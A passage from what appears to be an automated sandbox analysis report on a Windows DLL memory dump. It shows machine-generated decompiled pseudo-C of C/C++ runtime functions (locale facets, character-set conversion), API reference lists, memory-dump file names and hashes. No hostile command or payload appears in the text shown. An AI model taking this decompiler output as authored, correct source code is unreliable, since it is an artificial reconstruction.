																																								_t770 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t421);
																																								__eflags = _t770;
																																								if(_t770 != 0) {
																																									L89:
																																									E6E1C66BA(_t814 - 0x14);
																																									return E6E1E0075(_t770);
																																								} else {
																																									__eflags = _t789;
																																									if(_t789 == 0) {
																																										_push( *((intOrPtr*)(_t814 + 8)));
																																										_push(_t814 - 0x10);
																																										__eflags = E6E1D1409(_t575, _t662, _t756, _t770, _t789) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t814 - 0x20);
																																											E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t575, _t770, _t789, 0x14);
																																											E6E1C6653(_t814 - 0x14, 0);
																																											_t790 =  *0x6e286de0;
																																											 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																											 *(_t814 - 0x10) = _t790;
																																											_t434 = E6E1A161C(0x6e286d8c);
																																											_t669 =  *((intOrPtr*)(_t814 + 8));
																																											_t771 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t434);
																																											__eflags = _t771;
																																											if(_t771 != 0) {
																																												L96:
																																												E6E1C66BA(_t814 - 0x14);
																																												return E6E1E0075(_t771);
																																											} else {
																																												__eflags = _t790;
																																												if(_t790 == 0) {
																																													_push( *((intOrPtr*)(_t814 + 8)));
																																													_push(_t814 - 0x10);
																																													__eflags = E6E1D1471(_t575, _t669, _t756, _t771, _t790) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t814 - 0x20);
																																														E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t575, _t771, _t790, 0x14);
																																														E6E1C6653(_t814 - 0x14, 0);
																																														_t791 =  *0x6e286dfc;
																																														 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																														 *(_t814 - 0x10) = _t791;
																																														_t447 = E6E1A161C(0x6e286da8);
																																														_t676 =  *((intOrPtr*)(_t814 + 8));
																																														_t772 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t447);
																																														__eflags = _t772;
																																														if(_t772 != 0) {
																																															L103:
																																															E6E1C66BA(_t814 - 0x14);
																																															return E6E1E0075(_t772);
																																														} else {
																																															__eflags = _t791;
																																															if(_t791 == 0) {
																																																_push( *((intOrPtr*)(_t814 + 8)));
																																																_push(_t814 - 0x10);
																																																__eflags = E6E1D14EC(_t575, _t676, _t756, _t772, _t791) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t814 - 0x20);
																																																	E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t575, _t772, _t791, 0x14);
																																																	E6E1C6653(_t814 - 0x14, 0);
																																																	_t792 =  *0x6e286dcc;
																																																	 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																	 *(_t814 - 0x10) = _t792;
																																																	_t460 = E6E1A161C(0x6e286d80);
																																																	_t683 =  *((intOrPtr*)(_t814 + 8));
																																																	_t773 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t460);
																																																	__eflags = _t773;
																																																	if(_t773 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t814 - 0x14);
																																																		return E6E1E0075(_t773);
																																																	} else {
																																																		__eflags = _t792;
																																																		if(_t792 == 0) {
																																																			_push( *((intOrPtr*)(_t814 + 8)));
																																																			_push(_t814 - 0x10);
																																																			__eflags = E6E1D1558(_t575, _t683, _t756, _t773, _t792) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t814 - 0x20);
																																																				E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t575, _t773, _t792, 0x14);
																																																				E6E1C6653(_t814 - 0x14, 0);
																																																				_t793 =  *0x6e286e00;
																																																				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																				 *(_t814 - 0x10) = _t793;
																																																				_t473 = E6E1A161C(0x6e286dac);
																																																				_t690 =  *((intOrPtr*)(_t814 + 8));
																																																				_t774 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t473);
																																																				__eflags = _t774;
																																																				if(_t774 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t814 - 0x14);
																																																					return E6E1E0075(_t774);
																																																				} else {
																																																					__eflags = _t793;
																																																					if(_t793 == 0) {
																																																						_push( *((intOrPtr*)(_t814 + 8)));
																																																						_push(_t814 - 0x10);
																																																						__eflags = E6E1D15C4(_t575, _t690, _t756, _t774, _t793) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1A1438(_t814 - 0x20);
																																																							E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e2283cf, _t575, _t774, _t793, 0x14);
																																																							E6E1C6653(_t814 - 0x14, 0);
																																																							_t794 =  *0x6e286dd0;
																																																							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																							 *(_t814 - 0x10) = _t794;
																																																							_t486 = E6E1A161C(0x6e286d60);
																																																							_t697 =  *((intOrPtr*)(_t814 + 8));
																																																							_t775 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t486);
																																																							__eflags = _t775;
																																																							if(_t775 != 0) {
																																																								L124:
																																																								E6E1C66BA(_t814 - 0x14);
																																																								return E6E1E0075(_t775);
																																																							} else {
																																																								__eflags = _t794;
																																																								if(_t794 == 0) {
																																																									_push( *((intOrPtr*)(_t814 + 8)));
																																																									_push(_t814 - 0x10);
																																																									__eflags = E6E1D162A(_t575, _t697, _t756, _t775, _t794) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										_t701 = _t814 - 0x20;
																																																										E6E1A1438(_t701);
																																																										E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																																										asm("int3");
																																																										E6E1E00AC(0x6e22851f, _t575, _t775, _t794, 4);
																																																										_t795 = _t701;
																																																										 *(_t814 - 0x10) = _t795;
																																																										 *((intOrPtr*)(_t795 + 4)) =  *((intOrPtr*)(_t814 + 0xc));
																																																										_push( *((intOrPtr*)(_t814 + 0x14)));
																																																										_t259 = _t814 - 4;
																																																										 *_t259 =  *(_t814 - 4) & 0x00000000;
																																																										__eflags =  *_t259;
																																																										 *_t795 = 0x6e22c0c4;
																																																										 *((char*)(_t795 + 0x28)) =  *((intOrPtr*)(_t814 + 0x10));
																																																										E6E1D542F(_t575, _t701, _t756, _t775, _t795,  *_t259);
																																																										return E6E1E0075(_t795,  *((intOrPtr*)(_t814 + 8)));
																																																									} else {
																																																										_t775 =  *(_t814 - 0x10);
																																																										 *(_t814 - 0x10) = _t775;
																																																										 *(_t814 - 4) = 1;
																																																										E6E1C6FD3(__eflags, _t775);
																																																										 *0x6e22a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																																										 *0x6e286dd0 = _t775;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t775 = _t794;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t774 =  *(_t814 - 0x10);
																																																							 *(_t814 - 0x10) = _t774;
																																																							 *(_t814 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t774);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																																							 *0x6e286e00 = _t774;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t774 = _t793;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t773 =  *(_t814 - 0x10);
																																																				 *(_t814 - 0x10) = _t773;
																																																				 *(_t814 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t773);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																																																				 *0x6e286dcc = _t773;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t773 = _t792;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t772 =  *(_t814 - 0x10);
																																																	 *(_t814 - 0x10) = _t772;
																																																	 *(_t814 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t772);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																																																	 *0x6e286dfc = _t772;
																																																	goto L103;
																																																}
																																															} else {
																																																_t772 = _t791;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t771 =  *(_t814 - 0x10);
																																														 *(_t814 - 0x10) = _t771;
																																														 *(_t814 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t771);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																																														 *0x6e286de0 = _t771;
																																														goto L96;
																																													}
																																												} else {
																																													_t771 = _t790;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t770 =  *(_t814 - 0x10);
																																											 *(_t814 - 0x10) = _t770;
																																											 *(_t814 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t770);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																																											 *0x6e286ddc = _t770;
																																											goto L89;
																																										}
																																									} else {
																																										_t770 = _t789;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t769 =  *(_t814 - 0x10);
																																								 *(_t814 - 0x10) = _t769;
																																								 *(_t814 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t769);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																																								 *0x6e286db0 = _t769;
																																								goto L82;
																																							}
																																						} else {
																																							_t769 = _t788;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t768 =  *(_t814 - 0x10);
																																					 *(_t814 - 0x10) = _t768;
																																					 *(_t814 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t768);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																																					 *0x6e286dd8 = _t768;
																																					goto L75;
																																				}
																																			} else {
																																				_t768 = _t787;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t767 =  *(_t814 - 0x10);
																																		 *(_t814 - 0x10) = _t767;
																																		 *(_t814 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t767);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
																																		 *0x6e286dc4 = _t767;
																																		goto L68;
																																	}
																																} else {
																																	_t767 = _t786;
																																	goto L68;
																																}
																															}
																														} else {
																															_t766 =  *(_t814 - 0x10);
																															 *(_t814 - 0x10) = _t766;
																															 *(_t814 - 4) = 1;
																															E6E1C6FD3(__eflags, _t766);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
																															 *0x6e286dc8 = _t766;
																															goto L61;
																														}
																													} else {
																														_t766 = _t785;
																														goto L61;
																													}
																												}
																											} else {
																												_t765 =  *(_t814 - 0x10);
																												 *(_t814 - 0x10) = _t765;
																												 *(_t814 - 4) = 1;
																												E6E1C6FD3(__eflags, _t765);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
																												 *0x6e286df4 = _t765;
																												goto L54;
																											}
																										} else {
																											_t765 = _t784;
																											goto L54;
																										}
																									}
																								} else {
																									_t764 =  *(_t814 - 0x10);
																									 *(_t814 - 0x10) = _t764;
																									 *(_t814 - 4) = 1;
																									E6E1C6FD3(__eflags, _t764);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t764 + 4))))();
																									 *0x6e286df8 = _t764;
																									goto L47;
																								}
																							} else {
																								_t764 = _t783;
																								goto L47;
																							}
																						}
																					} else {
																						_t763 =  *(_t814 - 0x10);
																						 *(_t814 - 0x10) = _t763;
																						 *(_t814 - 4) = 1;
																						E6E1C6FD3(__eflags, _t763);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t763 + 4))))();
																						 *0x6e286dc0 = _t763;
																						goto L40;
																					}
																				} else {
																					_t763 = _t782;
																					goto L40;
																				}
																			}
																		} else {
																			_t762 =  *(_t814 - 0x10);
																			 *(_t814 - 0x10) = _t762;
																			 *(_t814 - 4) = 1;
																			E6E1C6FD3(__eflags, _t762);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t762 + 4))))();
																			 *0x6e286df0 = _t762;
																			goto L33;
																		}
																	} else {
																		_t762 = _t781;
																		goto L33;
																	}
																}
															} else {
																_t761 =  *(_t814 - 0x10);
																 *(_t814 - 0x10) = _t761;
																 *(_t814 - 4) = 1;
																E6E1C6FD3(__eflags, _t761);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t761 + 4))))();
																 *0x6e286dbc = _t761;
																goto L26;
															}
														} else {
															_t761 = _t780;
															goto L26;
														}
													}
												} else {
													_t760 =  *(_t814 - 0x10);
													 *(_t814 - 0x10) = _t760;
													 *(_t814 - 4) = 1;
													E6E1C6FD3(__eflags, _t760);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t760 + 4))))();
													 *0x6e286dec = _t760;
													goto L19;
												}
											} else {
												_t760 = _t779;
												goto L19;
											}
										}
									} else {
										_t759 =  *(_t814 - 0x10);
										 *(_t814 - 0x10) = _t759;
										 *(_t814 - 4) = 1;
										E6E1C6FD3(__eflags, _t759);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t759 + 4))))();
										 *0x6e286db8 = _t759;
										goto L12;
									}
								} else {
									_t759 = _t778;
									goto L12;
								}
							}
						} else {
							_t758 =  *(_t814 - 0x10);
							 *(_t814 - 0x10) = _t758;
							 *(_t814 - 4) = 1;
							E6E1C6FD3(__eflags, _t758);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t758 + 4))))();
							 *0x6e286de8 = _t758;
							goto L5;
						}
					} else {
						_t758 = _t777;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF18A
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF194
int.LIBCPMT ref: 6E1CF1AB

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

messages.LIBCPMT ref: 6E1CF1CE
std::_Facet_Register.LIBCPMT ref: 6E1CF1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF205
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF223

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: e51c6476727273d5dbdd295db96ac7c4300558f1306fb1629bb918e86a0b70fb
Instruction ID: 17cbc553947f46873d4d38657ca77728b4933f696d168cab1bf453b347714afc
Opcode Fuzzy Hash: e51c6476727273d5dbdd295db96ac7c4300558f1306fb1629bb918e86a0b70fb
Instruction Fuzzy Hash: 1F11E7799105198BCB01DBD4C854AFEB77AAFA4B14F244809E530AB290DF78D984E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21621F, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E21621F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_v8 =  *0x6e28506c ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E6E206BDB(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t103);
					return E6E1DF8A5(_v8 ^ _t105, _t95, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E6E1CDEE1(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E6E214640(_t85, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E6E1CDEE1(_t100);
									goto L36;
								}
								_t62 = E6E214640(_t87, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E6E1CDEE1(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E6E20F26D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E6E1E01B0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E6E214640(0, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6E20F26D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6E1E01B0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x6e216224
0x6e216225
0x6e21622d
0x6e216232
0x6e216238
0x6e21623e
0x6e216244
0x6e216247
0x6e216247
0x6e21624a
0x6e21624c
0x6e21624c
0x6e21624a
0x6e21624e
0x6e216253
0x6e21625a
0x6e21625d
0x6e21625d
0x6e216279
0x6e21627f
0x6e216284
0x6e216417
0x6e21641b
0x6e21642a
0x6e21628a
0x6e21628a
0x6e21628d
0x6e216292
0x6e216296
0x6e2162ea
0x6e2162ea
0x6e2162ec
0x6e2162ee
0x6e21640c
0x6e21640c
0x6e21640e
0x6e21640f
0x00000000
0x6e216415
0x6e2162ff
0x6e216305
0x6e216307
0x00000000
0x00000000
0x6e21630d
0x6e21631f
0x6e216324
0x6e216328
0x00000000
0x00000000
0x6e216335
0x6e21636f
0x6e216372
0x6e216375
0x6e216377
0x6e216379
0x6e21637b
0x6e2163c7
0x6e2163c7
0x6e2163c9
0x6e2163c9
0x6e2163cb
0x6e216405
0x6e216406
0x00000000
0x6e21640b
0x6e2163df
0x6e2163e4
0x6e2163e6
0x00000000
0x00000000
0x6e2163ea
0x6e2163eb
0x6e2163ec
0x6e2163ef
0x6e21642b
0x6e21642e
0x6e2163f1
0x6e2163f1
0x6e2163f2
0x6e2163f2
0x6e2163ff
0x6e216401
0x6e216403
0x6e216434
0x00000000
0x00000000
0x00000000
0x00000000
0x6e216403
0x6e21637d
0x6e216380
0x6e216382
0x6e216384
0x6e216386
0x6e216389
0x6e21638e
0x6e2163a9
0x6e2163ab
0x6e2163b5
0x6e2163b7
0x6e2163b8
0x6e2163ba
0x00000000
0x00000000
0x6e2163bc
0x6e2163c2
0x6e2163c2
0x00000000
0x6e2163c2
0x6e216390
0x6e216392
0x6e216396
0x6e21639b
0x6e21639d
0x6e21639f
0x00000000
0x00000000
0x6e2163a1
0x00000000
0x6e2163a1
0x6e216337
0x6e21633c
0x00000000
0x00000000
0x6e216342
0x6e216344
0x00000000
0x00000000
0x6e21635b
0x6e216360
0x6e216364
0x00000000
0x00000000
0x00000000
0x6e21636a
0x6e21629d
0x6e21629f
0x6e2162a1
0x6e2162a9
0x6e2162c8
0x6e2162ca
0x6e2162d4
0x6e2162d6
0x6e2162d7
0x6e2162d9
0x00000000
0x00000000
0x6e2162df
0x6e2162e5
0x6e2162e5
0x00000000
0x6e2162e5
0x6e2162ad
0x6e2162b1
0x6e2162b6
0x6e2162ba
0x00000000
0x00000000
0x6e2162c0
0x00000000
0x6e2162c0

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E1FF290,6E1FF290,?,?,?,6E216470,00000001,00000001,C5E85006), ref: 6E216279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E216470,00000001,00000001,C5E85006,?,?,?), ref: 6E2162FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2163F9
__freea.LIBCMT ref: 6E216406

Part of subcall function 6E20F26D: RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

__freea.LIBCMT ref: 6E21640F
__freea.LIBCMT ref: 6E216434

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 323c3f0b46da141275482b9cc833f38050f61a229ee2840e3ae1b3b9b275887e
Instruction ID: d17b67a0d4ae72e168519885af884913bf8c2d2ec0f161e1dbf85bf6c3583f73
Opcode Fuzzy Hash: 323c3f0b46da141275482b9cc833f38050f61a229ee2840e3ae1b3b9b275887e
Instruction Fuzzy Hash: 9A51B07262421BAFEB258EE4CC80EEF37EBEB44754F154629EE14D6140EB34DD918690

Uniqueness

Uniqueness Score: -1.00%

Function 6E2023DD, Relevance: 9.2, APIs: 6, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6E2023DD(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				void* _t120;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E6E214E0A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E6E20C7EF(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E6E20CBD3(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E6E214E0A(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E6E20E486(_t97, _t103, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E6E202188();
							asm("int3");
							E6E1E0990(_t97, _t123, 0x6e282bc0, 0x1c);
							_t130 = _a4;
							_t75 = E6E2023DD(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E6E20D5FF(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E6E2150ED( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E6E20F26D(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E6E2150ED( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E6E202361(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E6E20CBD3( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x6e2852ec & 0x00000001;
												if(( *0x6e2852ec & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E6E20CBD3( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E6E2025CE();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E6E20CBD3(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
